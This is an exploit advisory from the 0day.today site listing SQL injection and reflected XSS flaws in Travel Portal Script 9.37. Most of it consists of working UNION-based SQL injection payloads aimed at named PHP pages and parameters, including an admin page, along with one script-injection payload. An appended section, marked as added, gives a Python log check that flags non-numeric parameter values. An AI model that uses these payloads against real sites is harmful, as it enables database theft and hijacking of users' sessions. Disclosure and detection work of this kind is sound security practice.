
Travel Portal Script 9.37 Cross Site Scripting / SQL Injection Vulnerabilities

24 Feb 2017 00:00:00 | Reported by Marc Castejon | Type: zdt | Source: 0day.today

Travel Portal Script 9.37 Cross Site Scripting / SQL Injection Vulnerabilities, webapps, PHP, version 4.2

Code
Exploit Title : Travel Portal Script v9.37 - Multiple Vulnerabilities
Google Dork :    -
Date : 23/02/2017
Exploit Author : Marc Castejon <[email protected]>
Vendor Homepage : http://itechscripts.com/travel-portal-script/
Software Link: http://travel.itechscripts.com/
Type : webapps
Platform: PHP
Version: 4.29
Software Price and Demo : $250


------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/holiday.php
Vulnerable Parameters: hid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

------------------------------------------------

Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/holiday.php
Vulnerable Parameters: hid
Method: GET
Payload: "/><img src=i onerror=prompt(1)>

------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/pages.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

-------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/content.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

-------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/hotel.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

-------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/holiday_book.php
Vulnerable Parameters: hid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/admin/airline-edit.php
Vulnerable Parameters: fid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

------------------------------------------------

#  0day.today [2018-01-05]  #
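
An added example, not part of the original advisory or the vendor's code: a log check that flags requests to the scripts listed above whose reported parameter is not a plain integer. The assumption that `hid`, `id` and `fid` are numeric record ids, the `/travel/` path prefix and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> parameter pairs listed in the advisory above.
REPORTED = {
    "holiday.php": "hid", "holiday_book.php": "hid",
    "pages.php": "id", "content.php": "id", "hotel.php": "id",
    "admin/airline-edit.php": "fid",
}
# Assumption: each parameter is a numeric record id.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (not from the advisory).
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Feb/2017:10:00:01 +0000] "GET /travel/hotel.php?id=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [24/Feb/2017:10:00:07 +0000] "GET /travel/holiday.php?hid=-1%20UNION%20ALL%20SELECT%20NULL-- HTTP/1.1" 200 911',
    '203.0.113.9 - - [24/Feb/2017:10:00:09 +0000] "GET /travel/admin/airline-edit.php?fid=7abc HTTP/1.1" 200 640',
    '203.0.113.7 - - [24/Feb/2017:10:00:12 +0000] "GET /travel/index.php?id=home HTTP/1.1" 200 2048',
]


def reported_param(path):
    """Return the reported parameter if path ends in a listed script."""
    for script, param in REPORTED.items():
        if path.endswith("/" + script):
            return param
    return None


def suspicious_requests(log_lines):
    """Return (line_no, path, param, value) for each non-numeric value."""
    findings = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        param = reported_param(url.path)
        if param is None:
            continue
        # parse_qs percent-decodes; keep_blank_values also flags "hid=".
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not NUMERIC_ID.fullmatch(value):
                findings.append((line_no, url.path, param, value))
    return findings
```

The same numeric-only rule, enforced server-side before the value reaches the query or the page, covers both the SQL injection and the reflected XSS entries for these parameters.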
